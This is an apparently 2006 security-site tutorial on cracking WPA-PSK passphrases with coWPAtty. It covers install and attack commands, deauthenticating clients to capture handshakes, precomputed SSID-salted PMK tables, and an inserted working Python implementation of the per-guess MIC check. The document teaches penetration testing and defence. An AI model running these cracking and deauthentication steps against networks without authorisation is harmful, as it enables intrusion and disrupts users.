
UPDATE August 2006: coWPAtty 4.0 is now available from the churchofwifi (includes WPA2 cracking capabilities)

 

coWPAtty MAIN:

 

"coWPAtty is designed to audit the pre-shared key (PSK) selection for WPA networks based on the TKIP protocol." - Joshua Wright.

Project Homepage: http://www.churchofwifi.org/

 

Local Mirror: cowpatty-3.0.tgz  MD5: 9f050eda4f41b003bc37cd0813035441

 

Installing coWPAtty

 

coWPAtty Dictionary Attack

 

Precomputing WPA PMK to crack WPA PSK

 

coWPAtty Precomputed WPA Attack

 

 

Installing coWPAtty:

 

Download the latest coWPAtty (currently coWPAtty-3.0) to /tools/wifi

 

tar zxvf cowpatty-3.0.tgz

 

cd cowpatty-3.0

 

make

 

 

coWPAtty Dictionary Attack:

 

To perform the coWPAtty dictionary attack we need to supply the tool with a capture file that includes the WPA four-way handshake (the EAPOL-Key exchange between the client and the access point), a dictionary file of candidate passphrases to guess with, and the SSID of the network. The SSID is required because it is used as the salt when the passphrase is turned into the PMK, so the same passphrase produces a different key on every network name.

 

In order to collect the four-way handshake you can either wait until a client joins the network or, preferably, force an already associated client to rejoin by deauthenticating it with tools like void11 or aireplay, and capture the resulting handshake using something like kismet, ethereal or airodump. Messages 1 and 2 of the exchange are what a guess is actually verified against (the ANonce from the access point, and the SNonce plus MIC from the client), but capturing the whole exchange is the safest bet.

 

./cowpatty -r  wpa-test-01.cap -f dict -s cuckoo

 

 

 

 

In this run the dictionary attack took in excess of 3 minutes (around 200 seconds) for the test dictionary, almost all of it spent in the 4096-iteration PBKDF2 that turns each candidate passphrase into a PMK. We can speed up this process by precomputing the WPA PMK for every word ahead of time, leaving only the cheap MIC check for crack time (see below).

 

wpa-test-01.cap is the capture containing the four-way handshake

 

dict is the password file

 

cuckoo is the network SSID

 

 

Precomputing WPA PMK to crack WPA PSK:

 

genpmk is used to precompute the hash files, in a similar way to the rainbow tables used to pre-hash passwords in Windows LANMan attacks.  There is an important difference, however: in WPA the PMK is derived from the passphrase with PBKDF2-HMAC-SHA1 (4096 iterations, 256-bit output) using the network SSID as the "salt".  This means that we need a different set of hashes for each and every unique SSID, i.e. a set for "linksys", a set for "tsunami", etc., and that a genpmk file is a straight word-to-PMK lookup table rather than a true rainbow table (the salt rules out a time-memory trade-off that spans networks).  Note that the SSID is matched byte for byte, so it is case-sensitive and a trailing space counts.

 

 

So to generate some hash files for a network using the SSID cuckoo we use:

 

 

./genpmk  -f  dict  -d hashfile  -s cuckoo 

 

 

dict is the password file

 

hashfile is our output file

 

cuckoo is the network SSID

 

 

coWPAtty Precomputed WPA Attack:

 

Now that we have created our hash file we can use it against any WPA-PSK network that is using the SSID cuckoo (exactly that SSID; the hash file is useless against any other network name).  Remember the capture (wpa-test-01.cap) must contain the four-way handshake to be successful.

 

 

./cowpatty  -r  wpa-test-01.cap  -d  hashfile  -s cuckoo 

 

 

 

 

wpa-test-01.cap is the capture containing the four-way handshake

hashfile is our precomputed hashes

cuckoo is the network SSID

 

 

Notice that cracking the WPA-PSK took 0.21 seconds with the precomputed attack as opposed to 200 seconds in standard dictionary mode.  The work has not disappeared, it has been moved off-line: you still need to precompute the hash file beforehand, but once it exists each candidate costs only a PTK derivation and a MIC comparison instead of 4096 rounds of HMAC-SHA1.  Precomputing large hash files for common SSIDs (e.g. linksys, tsunami) is therefore a sensible move for most penetration testers, and the same property is why a unique SSID combined with a long random passphrase is the defender's answer to this attack.
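To make concrete what both the dictionary mode and the precomputed mode above do for each candidate, here is an added Python example (not code from this page, and not coWPAtty's or genpmk's own code). It derives the PMK with PBKDF2-HMAC-SHA1 salted by the SSID, expands it to the PTK, and recomputes the EAPOL-Key MIC of handshake message 2, which is the test that separates a right guess from a wrong one. The handshake (MACs, nonces, EAPOL frame), the SSID and the wordlist are constructed for the example rather than taken from a capture; the "hash file" is a plain Python dict, not genpmk's on-disk format; the IEEE 802.11i test vector (passphrase "password", SSID "IEEE") is used to confirm the PMK step.

```python
# Added example: the per-candidate check coWPAtty performs, plus the genpmk-style
# precompute/lookup split.  Not the project's code; the handshake is CONSTRUCTED.
import hashlib
import hmac
import time


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256 bits).
    The SSID is the salt, so one passphrase yields a different PMK per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for WPA/TKIP (512 bits); addresses and nonces are ordered Min || Max."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, wpa2: bool = False) -> bytes:
    """EAPOL-Key MIC over the frame with its MIC field zeroed: HMAC-MD5 for WPA/TKIP
    (key descriptor version 1), HMAC-SHA1 truncated to 128 bits for WPA2/CCMP (version 2)."""
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_mic_zeroed, digest).digest()[:16]


def candidate_matches(pmk: bytes, hs: dict) -> bool:
    """The cheap step: PMK -> PTK, KCK = PTK[0:16], recompute the MIC of message 2."""
    ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"], hs["wpa2"]), hs["mic"])


def crack_dictionary(hs: dict, ssid: str, words):
    """Dictionary mode (cowpatty -f): the expensive PBKDF2 runs for every word."""
    for word in words:
        if candidate_matches(pmk_from_passphrase(word, ssid), hs):
            return word
    return None


def precompute_pmks(words, ssid: str) -> dict:
    """genpmk analogue: PBKDF2 done once per (word, SSID) and stored as a lookup table."""
    return {word: pmk_from_passphrase(word, ssid) for word in words}


def crack_precomputed(hs: dict, table: dict):
    """Precomputed mode (cowpatty -d): only the PTK/MIC check is left per candidate."""
    for word, pmk in table.items():
        if candidate_matches(pmk, hs):
            return word
    return None


def constructed_handshake(passphrase: str, ssid: str) -> dict:
    """Synthetic WPA/TKIP handshake whose message-2 MIC is valid for passphrase on ssid.
    Every value here is CONSTRUCTED for the example; a real one is parsed from the capture."""
    hs = {
        "ap_mac": bytes.fromhex("001122334455"),
        "sta_mac": bytes.fromhex("66778899aabb"),
        "anonce": bytes(range(32)),
        "snonce": bytes(range(100, 132)),
        "wpa2": False,
    }
    # Key descriptor: type 0xfe (WPA), key info 0x0109 (version 1, pairwise, MIC set),
    # key length 32, replay counter 1, SNonce, zero IV/RSC/ID, zeroed MIC, empty key data.
    body = (b"\xfe\x01\x09\x00\x20" + (1).to_bytes(8, "big") + hs["snonce"]
            + bytes(16 + 8 + 8) + bytes(16) + b"\x00\x00")
    hs["eapol"] = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    hs["mic"] = eapol_mic(kck, hs["eapol"], hs["wpa2"])
    return hs


if __name__ == "__main__":
    SSID = "cuckoo"  # constructed, matching the page's example network
    WORDS = ["password", "linksys", "tsunami", "letmein1", "cuckoo-nest-42", "qwertyuiop"]
    hs = constructed_handshake("cuckoo-nest-42", SSID)
    t = time.perf_counter(); found = crack_dictionary(hs, SSID, WORDS); t_dict = time.perf_counter() - t
    table = precompute_pmks(WORDS, SSID)  # the off-line genpmk step
    t = time.perf_counter(); found2 = crack_precomputed(hs, table); t_pre = time.perf_counter() - t
    print(f"dictionary mode: {found!r} in {t_dict:.3f}s; precomputed mode: {found2!r} in {t_pre:.5f}s")
    # A table built for another SSID is useless here because the salt differs.
    print("table for SSID 'linksys' matches:", crack_precomputed(hs, precompute_pmks(WORDS, "linksys")))
```

Run it as a script and the timing line shows the same split the page reports: nearly all of the dictionary-mode time is PBKDF2, and the precomputed pass over the same words is orders of magnitude faster; the last line prints None, which is the per-SSID limitation of the tables in practice.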

 

 

The Church of Wifi have produced lookup tables for 1,000 SSIDs computed against a 170,000-word password file.  The resulting tables are approximately 7 gigabytes in size and can be downloaded via torrent or direct link:

 

http://www.churchofwifi.org/default.asp?PageLink=Project_Display.asp?PID=87

 

 


 
 
  © Copyright 2005-2006 Wirelessdefence.org. All Rights Reserved.